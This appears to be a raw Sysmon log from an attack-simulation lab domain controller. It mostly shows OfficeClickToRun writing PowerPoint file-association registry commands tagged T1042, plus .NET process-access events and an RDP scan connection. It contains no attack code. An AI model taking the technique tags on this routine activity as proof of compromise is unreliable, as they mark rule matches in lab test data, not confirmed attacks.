"%%1" 13241300x800000000000000075754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.686{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.UriLink.16\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe "%%1" 10341000x800000000000000075753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.670{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE6-607E-2A0D-00000000BB01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.655{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OrgPlusWOPX.4\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ORGCHART.EXE" %%1 10341000x800000000000000075751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.655{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBE6-607E-2A0D-00000000BB01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.655{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE6-607E-2A0D-00000000BB01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.655{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\ms-powerpoint\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe "%%1" 13241300x800000000000000075748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.639{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OfficeTheme.12\shell\Show\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "%%1" 13241300x800000000000000075747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.639{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OfficeTheme.12\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /p "%%1" 13241300x800000000000000075746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.623{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OfficeTheme.12\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "%%1" /ou "%%u" 13241300x800000000000000075745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.623{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OfficeTheme.12\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /n "%%1" 13241300x800000000000000075744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.608{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Slide.12\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vp "%%1" 13241300x800000000000000075743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.608{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Slide.12\shell\Show\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE /s "%%1" 13241300x800000000000000075742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.608{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Slide.12\shell\Print\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE /p "%%1" 13241300x800000000000000075741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.608{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Slide.12\shell\OpenAsReadOnly\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE /h "%%1" 13241300x800000000000000075740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.608{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Slide.12\shell\Open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE "%%1" /ou "%%u" 13241300x800000000000000075739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Slide.12\shell\New\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE /n "%%1" 13241300x800000000000000075738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Slide.12\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vu "%%1" 13241300x800000000000000075737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.577{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideMacroEnabled.12\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vp "%%1" 13241300x800000000000000075736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.577{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideMacroEnabled.12\shell\Show\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE /s "%%1" 13241300x800000000000000075735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.577{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideMacroEnabled.12\shell\Print\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE /p "%%1" 13241300x800000000000000075734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.577{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideMacroEnabled.12\shell\OpenAsReadOnly\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE /h "%%1" 13241300x800000000000000075733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.577{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideMacroEnabled.12\shell\Open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE "%%1" /ou "%%u" 13241300x800000000000000075732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.577{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideMacroEnabled.12\shell\New\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE /n "%%1" 13241300x800000000000000075731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.561{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideMacroEnabled.12\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vu "%%1" 13241300x800000000000000075730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.561{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Wizard.8\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "%%1" /ou "%%u" 13241300x800000000000000075729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.545{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\powerpointxmlfile\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" 13241300x800000000000000075728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.545{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Show.12\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vp "%%1" 13241300x800000000000000075727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.530{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Show.12\shell\Show\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "%%1" 13241300x800000000000000075726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.530{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Show.12\shell\PrintTo\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /pt "%%2" "%%3" "%%4" "%%1" 13241300x800000000000000075725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.530{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Show.12\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /p "%%1" 13241300x800000000000000075724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.530{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Show.12\shell\OpenAsReadOnly\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE /h "%%1" 13241300x800000000000000075723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.530{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Show.12\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "%%1" /ou "%%u" 10341000x800000000000000075722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.530{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE6-607E-290D-00000000BB01}4132C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.530{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Show.12\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /n "%%1" 13241300x800000000000000075720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Show.12\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vu "%%1" 10341000x800000000000000075719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.514{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBE6-607E-290D-00000000BB01}4132C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.514{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE6-607E-290D-00000000BB01}4132C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.ShowMacroEnabled.12\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vp "%%1" 13241300x800000000000000075716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.ShowMacroEnabled.12\shell\Show\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "%%1" 13241300x800000000000000075715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.ShowMacroEnabled.12\shell\PrintTo\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /pt "%%2" "%%3" "%%4" "%%1" 13241300x800000000000000075714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.ShowMacroEnabled.12\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /p "%%1" 13241300x800000000000000075713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.ShowMacroEnabled.12\shell\OpenAsReadOnly\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE /h "%%1" 354300x800000000000000075712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.253{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com63510-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 13241300x800000000000000075711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.483{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.ShowMacroEnabled.12\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "%%1" /ou "%%u" 13241300x800000000000000075710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.483{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.ShowMacroEnabled.12\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /n "%%1" 13241300x800000000000000075709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.483{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.ShowMacroEnabled.12\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vu "%%1" 13241300x800000000000000075708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\powerpointhtmlfile\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" 13241300x800000000000000075707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Show.8\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vp "%%1" 13241300x800000000000000075706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Show.8\shell\Show\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "%%1" 13241300x800000000000000075705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Show.8\shell\PrintTo\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /pt "%%2" "%%3" "%%4" "%%1" 13241300x800000000000000075704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.452{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Show.8\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /p "%%1" 13241300x800000000000000075703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.452{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Show.8\shell\OpenAsReadOnly\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE /h "%%1" 13241300x800000000000000075702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.452{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Show.8\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "%%1" /ou "%%u" 13241300x800000000000000075701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.452{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Show.8\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /n "%%1" 13241300x800000000000000075700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.452{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Show.8\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vu "%%1" 10341000x800000000000000075699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.436{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE6-607E-280D-00000000BB01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.D